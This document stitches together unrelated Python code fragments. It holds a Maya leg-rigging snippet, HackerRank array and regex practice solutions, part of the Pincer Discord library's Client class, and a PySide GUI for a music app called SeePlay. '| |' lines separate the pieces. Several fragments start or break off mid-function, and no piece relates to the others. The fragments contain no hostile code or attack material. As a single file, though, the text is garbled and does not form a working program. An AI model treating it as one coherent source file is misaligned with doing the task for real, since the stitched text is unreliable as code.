toeikHandle = cmds.ikHandle(sj=ogChain[3] + "_ik", ee=ogChain[4] + "_ik", sol="ikSCsolver", n=side + "toe_ikHandle")
# Create and place ik controller
ikFootControl = cmds.curve(d=2, p=[(0.997, 0, 1.789), (0, 0, 2.39), (-0.997,0,1.789), (-1.108, 0, 0), (-0.784, 0,-2.5),
(0, 0,-3), (0.784, 0, -2.5), (1.108, 0, 0), (0.997, 0, 1.789), (0, 0, 2.39)],
k=[0,1,2,3,4,5,6,7,8,9,10], n=side + "leg_anim_ik")
# Rename shape node
shapeList = cmds.listRelatives(ikFootControl, s = True)
| |
L[i - 2], L[i - 1], L[i] = L[i - 1], L[i], L[i - 2]
bribes += 2
else:
return "Too chaotic" # Expected person is more than 2 steps away.
return bribes
test_count = int(input())
for _ in range(test_count):
input()
line = list(map(int, input().split()))
print(bribe_count(line))
def brute_force(rt="O(n^2)"): # First thing that came to mind.
# Brute Force: O(n^2) approach.
# Notes:
# Based on Bubble sort implementation in:
# from Leo_Python_Notes import Algorithms_Sort.BubbleSort()
# Everyone starts with 2. If count is 0 and a swap is desired: "Too chaotic"
def bribe_count(line):
ppl = [[x, 2] for x in line] # #[[label, bribe_count], [label, bc2] ...]
bribes = 0
for i in range(len(line) - 1):
for j in range(len(line) - i - 1):
if ppl[j][0] > ppl[j + 1][0]:
ppl[j], ppl[j + 1] = ppl[j + 1], ppl[j]
ppl[j + 1][1] -= 1
bribes += 1
if ppl[j + 1][1] == -1:
return "Too chaotic"
return bribes
test_count = int(input())
for _ in range(test_count):
input()
line = list(map(int, input().split()))
print(bribe_count(line))
addto(Arrays__NewYearChaos, ds.arrays, diff.hard, time.hour_5, date(2019,5,22), source.hackerrank, tag.optimization)
def Arrays__Minimum_swaps(doc="""Meta:"This took some effort" Time:40m Difficulty:Medium Date: TAG__Array TAG__Insert URL:https://www.hackerrank.com/challenges/minimum-swaps-2/problem"""):
# Python2 ported to Python3 via 2to3-3.7
# Interesting fact: We know where item belongs since there are no duplicate and arr[i] <= n
# [7, 1, 3, 2, 4, 5, 6]
# Let's try different sort approaches:
# # O(n)
# # Insertion Sort. Move elemen to where it belongs. -> OK?
# [6, 1, 3, 2, 4, 5, 7] 1
# [1, 6, 3, 2, 4, 5, 7] 2
# [1, 5, 3, 2, 4, 6, 7] 3
# [1, 4, 3, 2, 5, 6, 7] 4
# [1, 2, 3, 4, 5, 6, 7] 5 -> OK. Not like example given, but seems to work.
#
# # O(n^2)
# # Selection sort like. Pick the element that 'belongs' -> TOO SLOW.
# [7, 1, 3, 2, 4, 5, 6] 0
# [1, 7, 3, 2, 4, 5, 6] 1
# [1, 2, 3, 7, 4, 5, 6] 2
# [1, 2, 3, 4, 7, 5, 6] 3
# [1, 2, 3, 4, 5, 7, 6] 4
# [1, 2, 3, 4, 5, 6, 7] 4
#
# # Let's try Insertion-Sort like behaviour for Examples 0,1,3
# # E.g 0
# 4 3 1 2 | 0
# 2 3 1 4 | 1
# 1 2 3 4 | 3 -> OK.
#
# # E.g 1
# 2 3 4 1 5 | 0
# 3 2 4 1 5 | 1
# 4 2 3 1 5 | 2
# 1 2 3 4 5 | 3 -> OK.
#
# # E.g 2
# 1 3 5 2 4 6 7 | 0
# 1 5 3 2 4 6 7 | 1
# 1 4 3 2 5 6 7 | 2
# 1 2 3 4 5 6 7 | 3 -> OK.
# All work. Let's implement:
_ = input()
arr = list(map(int, input().split()))
curr_pos = 1 # curr_pos shall mean array index starting from 1 (not 0)
swaps = 0
while curr_pos != len(arr):
element_at_curr_pos = arr[curr_pos - 1]
if element_at_curr_pos != curr_pos:
# Swap curr element with where it belongs.
arr[curr_pos - 1] = arr[element_at_curr_pos - 1]
arr[element_at_curr_pos - 1] = element_at_curr_pos
swaps += 1
else:
curr_pos += 1
print(swaps)
addto(Arrays__Minimum_swaps, ds.arrays, diff.med, time.hour, date(2019,5,20), source.hackerrank)
def Arrays__LeftRotation(doc="""Meta:"" Time:15m Difficulty:Easy Date:19/05/12 TAG__Array TAG__Rotate URL:https://www.hackerrank.com/challenges/ctci-array-left-rotation/problem"""):
# Python2 ported to Python3 via 2to3-3.7
_, d = list(map(int, input().split()))
arr = input().split()
print(" ".join(arr[d:] + arr[:d]))
addto(Arrays__LeftRotation, ds.arrays, time.min_30, diff.easy, source.hackerrank)
def Arrays__2D_ArraysDS(d="""Meta: TAG__Arrays TAG__Arrays_2D Date:19/05/12 Difficulty:Easy Time:20m URL:https://www.hackerrank.com/challenges/2d-array/problem?h_l=interview&playlist_slugs%5B%5D%5B%5D=interview-preparation-kit&playlist_slugs%5B%5D%5B%5D=arrays"""):
# Python2 ported to Python3 via 2to3-3.7
from itertools import chain
L = []
for _ in range(6):
L.append(list(map(int, input().split())))
max_sum = None
for i in range(4):
for j in range(4):
hr_sum = sum(chain(L[i][j:j + 3], [L[i + 1][j + 1]], L[i + 2][j:j + 3]))
if max_sum == None or hr_sum > max_sum:
max_sum = hr_sum
print(max_sum)
addto(Arrays__2D_ArraysDS, ds.arrays, diff.easy, time.min_30, source.hackerrank)
def Arrays__repeated_string(doc="""Meta: TAG__Array TAG__Indexing TAG__mod TAG__counting Date:19/05/12 Difficulty:Easy Time:20m URL:https://www.hackerrank.com/challenges/repeated-string/problem?h_l=interview&playlist_slugs%5B%5D%5B%5D=interview-preparation-kit&playlist_slugs%5B%5D%5B%5D=warmup"""):
# Python2 ported to Python3 via 2to3-3.7
# Count ref: https://www.geeksforgeeks.org/python-count-occurrences-of-a-character-in-string/
def repeatedString(s, n):
a_in_s_count = sum([1 if x == "a" else 0 for x in s])
s_in_n_count = n // len(s)  # whole copies of s within the first n characters
full_a_count = s_in_n_count * a_in_s_count
s_in_n_count_remainder = n % len(s)
remainder_a_count = sum([1 if x == "a" else 0 for x in s[:s_in_n_count_remainder]])
return full_a_count + remainder_a_count
s = input()
n = int(input())
print(repeatedString(s, n))
addto(Arrays__repeated_string, ds.arrays, date(2019, 5, 12), diff.easy, time.min_30, source.hackerrank)
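# Worked example (added for clarity, not part of the original solution):
# s = "aba", n = 10 -> a_in_s_count = 2, whole copies = 10 // 3 = 3 (6 a's),
# remainder = 10 % 3 = 1, s[:1] = "a" adds 1 more, so the printed answer is 7.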
def Arrays__Jumping_clouds(doc="""Meta: TAG__Array Date:19/05/12 Difficulty:Easy Time:20m URL:https://www.hackerrank.com/challenges/jumping-on-the-clouds/problem?h_l=interview&playlist_slugs%5B%5D%5B%5D=interview-preparation-kit&playlist_slugs%5B%5D%5B%5D=warmup"""):
# Python2 ported to Python3 via 2to3-3.7
print(doc)
_, clouds = input(), list(map(int, input().split()))
jumps, curr_pos = 0, 0
end_pos = len(clouds) - 1
for _ in range(len(clouds)):
if curr_pos == end_pos:
break
if curr_pos == end_pos - 1:
jumps += 1
break
curr_pos += 2 if clouds[curr_pos + 2] == 0 else 1
jumps += 1
print(jumps)
addto(Arrays__Jumping_clouds, ds.arrays, diff.easy, time.min_30, date(2019,5,12), source.hackerrank)
def Array__counting_valleys(doc="""Meta: TAG__Array TAG__T Date: Difficulty:Easy Time:9m URL:https://www.hackerrank.com/challenges/counting-valleys/problem?h_l=interview&playlist_slugs%5B%5D%5B%5D=interview-preparation-kit&playlist_slugs%5B%5D%5B%5D=warmup"""):
# Python2 ported to Python3 via 2to3-3.7
# Keep track of current position. (height wise)
# Count # of occurences where we go down from sea level [0, -1]
_, path, valley_count, curr_pos = input(), input(), 0, 0
for step in path:
if curr_pos == 0 and step == "D":
valley_count += 1
curr_pos += 1 if step == "U" else -1
print(valley_count)
addto(Array__counting_valleys, ds.arrays, diff.easy, time.min_30, date(2019,5,10), source.hackerrank)
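# Worked example (added for clarity, not part of the original solution):
# for the path "UDDDUDUU" the height after each step is 1,0,-1,-2,-1,-2,-1,0;
# the only "D" taken while standing at sea level is the third step, so exactly
# one valley is counted.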
def Arrays__Matching_socks(doc="""Meta: TAG__set TAG__deduplicate Date:19/05/11 Difficulty:Easy Time:4m URL:https://www.hackerrank.com/challenges/sock-merchant/problem?h_l=interview&playlist_slugs%5B%5D%5B%5D=interview-preparation-kit&playlist_slugs%5B%5D%5B%5D=warmup"""):
# Python2 ported to Python3 via 2to3-3.7
# Solved in 4 minutes.
_ = input()
ar = list(map(int, input().split()))
seen_socks = set()
pair_count = 0
for s in ar:
if s in seen_socks:
pair_count += 1
seen_socks.remove(s)
else:
seen_socks.add(s)
print(pair_count)
addto(Arrays__Matching_socks, ds.arrays, diff.easy, date(2019,5,1), time.min_15, source.hackerrank)
def hackerrank_Python_Regex__Matrix_script(doc="""Meta: TAG__Regex TAG__Groups TAG__Lookahead TAG__substitution Date: Difficulty:Hard Time:65m URL:https://www.hackerrank.com/challenges/matrix-script/problem"""):
# Python2 ported to Python3 via 2to3-3.7
# LNOTE: This was hard :-O. Phew.
import re
Rows, Cols = list(map(int, input().split()))
wrapped = "".join([input() for _ in range(Rows)])
decoded = []
for i in range(Cols):
# Generate Regex:
# with i = 0,1,2, construct (.).. .(.). ..(.)
rx = ["."] * Cols
rx[i] = "(.)"
rx_str = "".join(rx)
for matched in re.finditer(rx_str, wrapped):
decoded.append(matched.group(1))
decoded_string = "".join(decoded)
# Note, reverse lookahead cannot contain wildcards. Workaround:
# \g<1> is reference to first group. I.e replace (group1)+[!@..] with (group1)+" "
# (?=...) only if ahead is...
print(re.sub("([a-zA-Z0-9]+)[!@#$%& ]+(?=.*[a-zA-Z0-9]+)", "\g<1> ", decoded_string))
def hackerrank_Python_Regex__Validating_postcode(doc="""Meta: TAG__Regex TAG__LookAhead Date:19/05/10 Difficulty:Medium Time:20m URL:https://www.hackerrank.com/challenges/validating-postalcode/problem"""):
# Python2 ported to Python3 via 2to3-3.7
# LNote: Tricky par is the alternating consequitive repeition without consuming.
regex_integer_in_range = r"^[1-9]\d{5}$" # Do not delete 'r'.
regex_alternating_repetitive_digit_pair = r"(.)(?=.\1)" # Do not delete 'r'.
import re
P = input()
print((bool(re.match(regex_integer_in_range, P))
and len(re.findall(regex_alternating_repetitive_digit_pair, P)) < 2))
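# Quick check (an added example, not in the original solution):
# "121426" contains one alternating repetitive pair ('1' at indices 0 and 2) and is
# accepted, while "110000" contains two ('0' at indices 2/4 and 3/5) and is rejected
# even though it lies in the 100000-999999 range.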
def hackerrank_Python_Regex__validate_credit_card(doc="""Meta: TAG__Regex TAG__Repeating Date:19/05/10 Difficulty:Medium Time:21m URL:https://www.hackerrank.com/challenges/validating-credit-card-number/problem"""):
# Python2 ported to Python3 via 2to3-3.7
# LNOTE: I tend to make the mistake of forgetting to make exact match: ^....$
import re
for _ in range(int(input())):
line = input()
# - Validate it's either 16 digits or separeted into groups of 4.
# - Validate [456] as first group.
if re.match(r'^[456](\d{3}-\d{4}-\d{4}-\d{4}|\d{15})$', line):
# Remove dashes if there are any.
line2 = "".join(line.split("-"))
# Must not have 4 or more repeating digits.
if re.search(r"^(?!.*([0-9])\1{3,}).+$", line2): # If no 4 consequive.
print("Valid")
continue
print("Invalid")
def hackerrank_Python_Regex__valid_UID(doc="""Meta: TAG__Regex TAG__NoRepetition Date:19/05/10 Difficulty:Medium Time:30m URL:https://www.hackerrank.com/challenges/validating-uid/problem"""):
# Python2 ported to Python3 via 2to3-3.7
import re
def is_valid_UID(UID):
two_chars = bool(re.search(r"[A-Z].*[A-Z]", UID))
# Better: (.*[A-Z]){2}
three_digits = bool(re.search(r"[0-9].*[0-9].*[0-9]", UID))
alphaNum = bool(re.search(r"^[a-zA-Z0-9]{10}$", UID))
norepeat = bool(re.search(r"^(?!.*(\w).*\1{1,}).+$", UID)) # No repetition. Interesting. -> .*(.).*\1+.*
# Explanation: https://stackoverflow.com/questions/31897806/regular-expression-to-match-string-without-repeated-characters
return two_chars and three_digits and alphaNum and norepeat
import os
if "USER" not in os.environ:
for _ in range(int(input())):
if is_valid_UID(input()):
print("Valid")
else:
print("Invalid")
raise SystemExit
ts = [
("B1CD102354", False) # 1 repeats
, ("B1CDEF2354", True)
, ("ABCD123HII", False) | |
# Copyright Pincer 2021-Present
# Full MIT License can be found in `LICENSE` at the project root.
from __future__ import annotations
import logging
from asyncio import iscoroutinefunction, run, ensure_future
from inspect import isasyncgenfunction
from typing import Optional, Any, Union, Dict, Tuple, List
from . import __package__
from ._config import events
from .commands import ChatCommandHandler
from .core.dispatch import GatewayDispatch
from .core.gateway import Dispatcher
from .core.http import HTTPClient
from .exceptions import InvalidEventName
from .middleware import middleware
from .objects import User, Intents, Guild, ThrottleInterface
from .objects.throttling import DefaultThrottleHandler
from .utils import get_index, should_pass_cls, Coro
_log = logging.getLogger(__package__)
MiddlewareType = Optional[Union[Coro, Tuple[str, List[Any], Dict[str, Any]]]]
_events: Dict[str, Optional[Union[str, Coro]]] = {}
for event in events:
event_final_executor = f"on_{event}"
# Event middleware for the library.
# Function argument is a payload (GatewayDispatch).
# The function must return a string which
# contains the main event key.
# As second value a list with arguments,
# and the third value must be a dictionary.
# The last two are passed on as *args and **kwargs.
# NOTE: These return values must be passed as a tuple!
_events[event] = event_final_executor
# The registered event by the client. Do not manually overwrite.
_events[event_final_executor] = None
def event_middleware(call: str, *, override: bool = False):
"""
Middleware are methods which can be registered with this decorator.
These methods are invoked before any ``on_`` event,
as the ``on_`` event is the final call.
A default call exists for all events, but some might already be in
use by the library.
If you know what you are doing, you can override these default
middleware methods by passing the override parameter.
The method to which this decorator is registered must be a coroutine,
and it must return a tuple with the following format:
.. code-block:: python
tuple(
key for next middleware or final event [str],
args for next middleware/event which will be passed as *args
[list(Any)],
kwargs for next middleware/event which will be passed as
**kwargs [dict(Any)]
)
Two parameters are passed to the middleware. The first parameter is
the current socket connection with and the second one is the payload
parameter which is of type :class:`~.core.dispatch.GatewayDispatch`.
This contains the response from the discord API.
:Implementation example:
.. code-block:: pycon
>>> @event_middleware("ready", override=True)
>>> async def custom_ready(_, payload: GatewayDispatch):
>>> return "on_ready", [
>>> User.from_dict(payload.data.get("user"))
>>> ]
>>> @Client.event
>>> async def on_ready(bot: User):
>>> print(f"Signed in as {bot}")
:param call:
The call where the method should be registered.
Keyword Arguments:
:param override:
Setting this to True will allow you to override existing
middleware. Usage of this is discouraged, but can help you out
of some situations.
"""
def decorator(func: Coro):
if override:
_log.warning(
"Middleware overriding has been enabled for `%s`."
" This might cause unexpected behavior.", call
)
if not override and callable(_events.get(call)):
raise RuntimeError(
f"Middleware event with call `{call}` has "
"already been registered"
)
async def wrapper(cls, payload: GatewayDispatch):
_log.debug("`%s` middleware has been invoked", call)
return await (
func(cls, payload)
if should_pass_cls(func)
else func(payload)
)
_events[call] = wrapper
return wrapper
return decorator
for event, middleware in middleware.items():
event_middleware(event)(middleware)
class Client(Dispatcher):
def __init__(
self,
token: str, *,
received: str = None,
intents: Intents = None,
throttler: ThrottleInterface = DefaultThrottleHandler
):
"""
The client is the main instance which is between the programmer
and the discord API.
This client represents your bot.
:param token:
The secret bot token which can be found in
`<https://discord.com/developers/applications/<bot_id>/bot>`_
:param received:
The default message which will be sent when no response is
given.
:param intents:
The discord intents for your client.
"""
super().__init__(
token,
handlers={
# Gets triggered on all events
-1: self.payload_event_handler,
# Use this event handler for opcode 0.
0: self.event_handler
},
intents=intents or Intents.NONE
)
self.bot: Optional[User] = None
self.received_message = received or "Command arrived successfully!"
self.http = HTTPClient(token)
self.throttler = throttler
@property
def chat_commands(self):
"""
Get a list of chat command calls which have been registered in
the ChatCommandHandler.
"""
return [cmd.app.name for cmd in ChatCommandHandler.register.values()]
@staticmethod
def event(coroutine: Coro):
"""
Register a Discord gateway event listener. This event will get
called when the client receives a new event update from Discord
which matches the event name.
The event name gets pulled from your method name, and this must
start with ``on_``.
This forces you to write clean and consistent code.
This decorator can be used in and out of a class, and all
event methods must be coroutines. *(async)*
:Example usage:
.. code-block:: pycon
>>> # Function based
>>> from pincer import Client
>>>
>>> client = Client("token")
>>>
>>> @client.event
>>> async def on_ready():
... print(f"Signed in as {client.bot}")
>>>
>>> if __name__ == "__main__":
... client.run()
.. code-block :: pycon
>>> # Class based
>>> from pincer import Client
>>>
>>> class BotClient(Client):
... @Client.event
... async def on_ready(self):
... print(f"Signed in as {self.bot}")
>>>
>>> if __name__ == "__main__":
... BotClient("token").run()
:param coroutine: # TODO: add info
:raises TypeError:
If the method is not a coroutine.
:raises InvalidEventName:
If the event name does not start with ``on_``, has already
been registered or is not a valid event name.
"""
if not iscoroutinefunction(coroutine) \
and not isasyncgenfunction(coroutine):
raise TypeError(
"Any event which is registered must be a coroutine function"
)
name: str = coroutine.__name__.lower()
if not name.startswith("on_"):
raise InvalidEventName(
f"The event named `{name}` must start with `on_`"
)
if _events.get(name) is not None:
raise InvalidEventName(
f"The event `{name}` has already been registered or is not "
f"a valid event name."
)
_events[name] = coroutine
return coroutine
@staticmethod
def get_event_coro(name: str) -> Optional[Coro]:
call = _events.get(name.strip().lower())
if iscoroutinefunction(call) or isasyncgenfunction(call):
return call
def run(self):
"""Start the event listener"""
self.start_loop()
run(self.http.close())
async def handle_middleware(
self,
payload: GatewayDispatch,
key: str,
*args,
**kwargs
) -> Tuple[Optional[Coro], List[Any], Dict[str, Any]]:
"""
Handles all middleware recursively. Stops when it has found an
event name which starts with ``on_``.
:param payload:
The original payload for the event.
:param key:
The index of the middleware in ``_events``.
:param \\*args:
The arguments which will be passed to the middleware.
:param \\*\\*kwargs:
The named arguments which will be passed to the middleware.
:return:
A tuple where the first element is the final executor
(so the event), i.e. its index in ``_events``.
The second and third element are the ``*args``
and ``**kwargs`` for the event.
"""
ware: MiddlewareType = _events.get(key)
next_call, arguments, params = ware, [], {}
if iscoroutinefunction(ware):
extractable = await ware(self, payload, *args, **kwargs)
if not isinstance(extractable, tuple):
raise RuntimeError(
f"Return type from `{key}` middleware must be tuple. "
)
next_call = get_index(extractable, 0, "")
arguments = get_index(extractable, 1, [])
params = get_index(extractable, 2, {})
if next_call is None:
raise RuntimeError(f"Middleware `{key}` has not been registered.")
return (
(next_call, arguments, params)
if next_call.startswith("on_")
else await self.handle_middleware(
payload, next_call, *arguments, **params
)
)
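# Illustrative flow (an added sketch, not part of the library source): for a
# "ready" dispatch the registered "ready" middleware returns
# ("on_ready", [User(...)], {}); because that key starts with "on_" the
# recursion stops and ("on_ready", [user], {}) is returned to the caller.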
async def execute_error(
self,
error: Exception,
name: str = "on_error",
*args,
**kwargs
):
"""
Raises an error if no appropriate error event has been found.
:param error:
The error which should be raised or passed to the event.
:param name:
The name of the event, and how it is registered by the client.
:param \\*args:
The arguments for the event.
:param \\*\\*kwargs:
The named arguments for the event.
"""
if call := self.get_event_coro(name):
self.execute_event(call, error, *args, **kwargs)
else:
raise error
def execute_event(self, call: Coro, *args, **kwargs):
"""
Invokes an event.
:param call:
The call (method) to which the event is registered.
:param \\*args:
The arguments for the event.
:param \\*\\*kwargs:
The named arguments for the event.
"""
def execute(*_args, **_kwargs):
ensure_future(call(*_args, **_kwargs))
if should_pass_cls(call):
args = (self, *args)
execute(*args, **kwargs)
async def process_event(self, name: str, payload: GatewayDispatch):
"""
Processes and invokes an event and its middleware.
:param name:
The name of the event, this is also the filename in the
middleware directory.
:param payload:
The payload sent from the Discord gateway, this contains the
required data for the client to know what event it is and
what specifically happened.
"""
try:
| |
# gui.py
from PySide import QtGui, QtCore
import pymouse
import watchman
import collections
import threading
import time
import mixer
window_w = 640
window_h = 400
class SPApp(QtGui.QMainWindow):
orch_text = "A light orchestral accompaniment, reacting to colour changes."
elec_text = "A soft-pad synth accompaniment, reacting to colour changes."
horr_text = "A highly reactive accompaniment, with orchestral instrumentation."
sile_text = "A reactive solo piano accompaniment."
acti_text = "A reactive and frantic orchestral accompaniment."
infotexts = collections.OrderedDict()
prog_types = collections.OrderedDict()
mode_types = collections.OrderedDict()
user_inputsrc = ""
user_inputsrcinfo = ""
user_type = ""
user_genre = ""
user_key = ""
user_mode = ""
user_tempo = ""
user_tempo_modifier = ""
user_tsig = ""
user_inputregion = []
user_score_title = "SeePlay auto-score"
user_sheetmusic = False
user_midioutput = False
user_prog_type = ""
screen_x = 0
screen_y = 0
def __init__(self):
super(SPApp, self).__init__()
self.init_ui()
self.open_mixer()
def populate_dictionaries(self):
self.infotexts["Standard A"] = "A standard, balanced ambient profile. (colour driven)"
# self.infotexts["Standard B"] = "A standard, balanced ambient profile. (motion driven)"
# self.infotexts["Sparse"] = "A more spaced out ambient profile."
self.prog_types["None"] = "none"
self.prog_types["Random"] = "random"
self.prog_types["Relative (I VI)"] = "relative"
self.prog_types["Blues (I IV V)"] = "blues"
self.prog_types["I to V"] = "fifth"
self.prog_types["50s (I VI IV V)"] = "50s"
self.prog_types["Circle of fifths"] = "circ5"
self.prog_types["Circle of fourths"] = "circ4"
self.mode_types["Major"] = "major"
self.mode_types["Minor"] = "minor"
self.mode_types["Ionian"] = "ionian"
self.mode_types["Dorian"] = "dorian"
self.mode_types["Phrygian"] = "phrygian"
self.mode_types["Lydian"] = "lydian"
self.mode_types["Mixolydian"] = "mixolydian"
self.mode_types["Aeolian"] = "aeolian"
self.mode_types["Locrian"] = "locrian"
self.mode_types["Arabic"] = "arabic"
def init_ui(self):
self.center()
self.setWindowTitle('SeePlay')
self.setFixedSize(window_w, window_h)
m = pymouse.PyMouse()
screencoords = m.screen_size()
self.screen_x = int(screencoords[0])
self.screen_y = int(screencoords[1])
boxheight = 30
self.populate_dictionaries()
# SETTING THE SCENE
leftbg = QtGui.QLabel(self)
leftbg.resize(window_w*0.33,window_h)
leftbg.move(0,0)
leftbg.setStyleSheet("QLabel { background-color: #333333; color: #EEEEEE; }")
rightbgtop = QtGui.QLabel(self)
rightbgtop.resize(window_w*0.68,window_h)
rightbgtop.move(window_w*0.33,0)
rightbgtop.setStyleSheet("QLabel { background-color: #666666; color: #EEEEEE; }")
rightbgbtm = QtGui.QLabel(self)
rightbgbtm.resize(window_w*0.68,window_h)
rightbgbtm.move(window_w*0.33,window_h*0.5)
rightbgbtm.setStyleSheet("QLabel { background-color: #666666; color: #EEEEEE; }")
title = QtGui.QLabel(self)
title.resize(window_w*0.33,35)
title.move(0,0)
title.setText('SeePlay')
title.setStyleSheet("QLabel { padding: 5px; font-size: 20px; text-align: center; background-color: rgba(100, 100, 100, 100); color: #EFEFEF; }")
# INTERACTIVE CONTROLS
# termout = QtGui.QTextEdit(self)
# termout.resize(window_w*0.33-10,window_h*0.7)
# termout.move(5,boxheight+10)
# termout.setReadOnly(True)
watchbtn_slot = 0
stop_slot = 2
midiout_slot = 3
sheetout_slot = 4
mixer_slot = 5
# oldwatchbtn = QtGui.QPushButton('Old school sampling', self)
# oldwatchbtn.resize(window_w * 0.33 - 10, boxheight)
# oldwatchbtn.move(5, ((oldwatchbtn_slot * boxheight) + title.height() + 5))
# oldwatchbtn.clicked.connect(lambda: self.launch_old_watch(64))
# showtog = QtGui.QCheckBox("Show CV Window?", self)
# showtog.resize(window_w*0.33-10, boxheight)
# showtog.move(5, ((showtog_slot * boxheight) + title.height() + 5) - 5)
# showtog.setStyleSheet("QCheckBox { padding: 5px; color: #EFEFEF; }")
watchbtn = QtGui.QPushButton('LAUNCH', self)
watchbtn.resize(window_w*0.33-10, 2 * boxheight)
watchbtn.move(5, ((watchbtn_slot * boxheight) + title.height() + 5) - 5)
watchbtn.clicked.connect(lambda: self.launch_watch())
stopbtn = QtGui.QPushButton('STOP', self)
stopbtn.resize(window_w * 0.33 - 10, boxheight * 1)
stopbtn.move(5, ((stop_slot * boxheight) + title.height() + 5) - 5)
stopbtn.clicked.connect(lambda: self.stop_watch())
self.midibtn = QtGui.QCheckBox(self)
self.midibtn.resize(window_w * 0.33 - 10, boxheight * 1)
self.midibtn.move(10, ((midiout_slot * boxheight) + title.height() + 5) - 5)
self.midibtn.setChecked(False)
self.midibtn.stateChanged.connect(self.set_user_midioutput)
self.midibtnlbl = QtGui.QLabel('Generate MIDI file?', self)
self.midibtnlbl.resize(window_w * 0.33 - 10, boxheight * 1)
self.midibtnlbl.move(25, ((midiout_slot * boxheight) + title.height() + 5) - 5)
self.midibtnlbl.setStyleSheet("QLabel { padding: 5px; font-size: 12px; text-align: center; color: #FFFFFF; }")
self.sheetbtn = QtGui.QCheckBox(self)
self.sheetbtn.resize(window_w * 0.33 - 10, boxheight * 1)
self.sheetbtn.move(10, ((sheetout_slot * boxheight) + title.height() + 5) - 5)
self.sheetbtn.setChecked(False)
self.sheetbtn.stateChanged.connect(self.set_user_sheetmusic)
self.sheetbtnlbl = QtGui.QLabel('Generate sheet music?', self)
self.sheetbtnlbl.resize(window_w * 0.33 - 10, boxheight * 1)
self.sheetbtnlbl.move(25, ((sheetout_slot * boxheight) + title.height() + 5) - 5)
self.sheetbtnlbl.setStyleSheet("QLabel { padding: 5px; font-size: 12px; text-align: center; color: #FFFFFF; }")
mixerbtn = QtGui.QPushButton('OPEN MIXER', self)
mixerbtn.resize(window_w * 0.33 - 10, boxheight * 1)
mixerbtn.move(5, ((mixer_slot * boxheight) + title.height() + 5) - 5)
mixerbtn.clicked.connect(lambda: self.open_mixer())
# RIGHT BUTTONS
# VISUAL SETTINGS
# SLOTS
visopt_slot = 0
inputsrc_slot = 1
inputsrcinfo_slot = 2
audioopt_slot = 3
type_slot = 4
# genre_slot = 5
genreinfo_slot = 5
key_slot = 6
mode_slot = 7
prog_slot = 8
tempo_slot = 9
tsig_slot = 10
geninfo_slot = 11
stitle = QtGui.QLabel(self)
stitle.resize(window_w*0.68,boxheight)
stitle.move(window_w*0.33,0)
stitle.setText('Visual options')
stitle.setStyleSheet("QLabel { padding: 5px; font-size: 18px; text-align: center; background-color: rgba(200, 200, 200, 150); color: #333333; }")
# Look out for
inputsrc = QtGui.QLabel(self)
inputsrc.resize(window_w*0.16,boxheight)
inputsrc.move(window_w*0.33, (inputsrc_slot * boxheight) + 5)
inputsrc.setText('Input region: ')
inputsrc.setStyleSheet("QLabel { padding: 5px; font-size: 12px; text-align: center; color: #FFFFFF; }")
self.inputsrcall = QtGui.QPushButton("Whole screen",self)
self.inputsrcall.resize(window_w*0.25,boxheight)
self.inputsrcall.move(window_w*0.33 + window_w*0.16, inputsrc_slot * boxheight + 5)
self.inputsrcall.clicked.connect(lambda: self.set_user_inputsrc("whole", False))
self.inputsrcreg = QtGui.QPushButton("Region",self)
self.inputsrcreg.resize(window_w*0.25,boxheight)
self.inputsrcreg.move(window_w*0.33 + window_w*0.41, inputsrc_slot * boxheight + 5)
self.inputsrcreg.clicked.connect(lambda: self.set_user_inputsrc("manual", True))
self.inputsrcinfo = QtGui.QLabel("",self)
self.inputsrcinfo.resize(window_w*0.66,boxheight)
self.inputsrcinfo.move(window_w * 0.33, inputsrcinfo_slot * boxheight + 5)
self.inputsrcinfo.setStyleSheet("QLabel { padding: 5px; font-style: italic; font-size: 10px; text-align: center; color: #FFFFFF; }")
# AUDIO SETTINGS
stitle2 = QtGui.QLabel(self)
stitle2.resize(window_w*0.68,boxheight)
stitle2.move(window_w*0.33, (audioopt_slot * boxheight) + 10)
stitle2.setText('Audio options')
stitle2.setStyleSheet("QLabel { padding: 5px; font-size: 18px; text-align: center; background-color: rgba(200, 200, 200, 150); color: #333333; }")
# Genre
# genre = QtGui.QLabel(self)
# genre.resize(window_w*0.16,boxheight)
# genre.move(window_w*0.33, (genre_slot * boxheight) + 15)
# genre.setText('Profile: ')
# genre.setStyleSheet("QLabel { padding: 5px; font-size: 12px; text-align: center; color: #FFFFFF; }")
# self.genrebox = QtGui.QComboBox(self)
# self.genrebox.resize(window_w*0.5,boxheight)
# self.genrebox.move(window_w*0.33 + window_w*0.16, (genre_slot * boxheight) + 15)
# self.genrebox.addItem("Classical")
# self.genrebox.addItem("Electronic")
# Music type
mustype = QtGui.QLabel(self)
mustype.resize(window_w*0.16,boxheight)
mustype.move(window_w*0.33, (type_slot * boxheight) + 15)
mustype.setText('Profile: ')
mustype.setStyleSheet("QLabel { padding: 5px; font-size: 12px; text-align: center; color: #FFFFFF; }")
self.mustypebox = QtGui.QComboBox(self)
self.mustypebox.resize(window_w*0.5,boxheight)
self.mustypebox.move(window_w*0.33 + window_w*0.16, (type_slot * boxheight) + 15)
sorted_profile = collections.OrderedDict(self.infotexts)
for key, value in sorted_profile.iteritems():
self.mustypebox.addItem(key)
self.mustypebox.activated[str].connect(lambda: self.switch_genre_box(self.mustypebox.currentText()))
# self.genrebox.activated[str].connect(lambda: self.switch_genre_info_box(self.genrebox.currentText()))
# Genre Info
self.genreinfo = QtGui.QLabel(self)
self.genreinfo.resize(window_w*0.68,boxheight)
self.genreinfo.setText(self.infotexts[self.mustypebox.currentText()])
self.genreinfo.move(window_w*0.33, (genreinfo_slot * boxheight) + 15)
self.genreinfo.setStyleSheet("QLabel { padding: 5px; font-size: 12px; font-weight: bold; text-align: center; color: #FFFFFF; }")
# Key
keysig = QtGui.QLabel(self)
keysig.resize(window_w*0.16,boxheight)
keysig.move(window_w*0.33, (key_slot * boxheight) + 15)
keysig.setText('Key: ')
keysig.setStyleSheet("QLabel { padding: 5px; font-size: 12px; text-align: center; color: #FFFFFF; }")
self.keysigbox = QtGui.QComboBox(self)
self.keysigbox.resize(window_w*0.5,boxheight)
self.keysigbox.move(window_w*0.33 + window_w*0.16, (key_slot * boxheight) + 15)
self.keysigbox.addItem("C")
self.keysigbox.addItem("C#")
self.keysigbox.addItem("D")
self.keysigbox.addItem("Eb")
self.keysigbox.addItem("E")
self.keysigbox.addItem("F")
self.keysigbox.addItem("F#")
self.keysigbox.addItem("G")
self.keysigbox.addItem("Ab")
self.keysigbox.addItem("A")
self.keysigbox.addItem("Bb")
self.keysigbox.addItem("B")
self.keysigbox.activated[str].connect(lambda: self.set_user_key(self.keysigbox.currentText()))
# Key
mode = QtGui.QLabel(self)
mode.resize(window_w*0.16,boxheight)
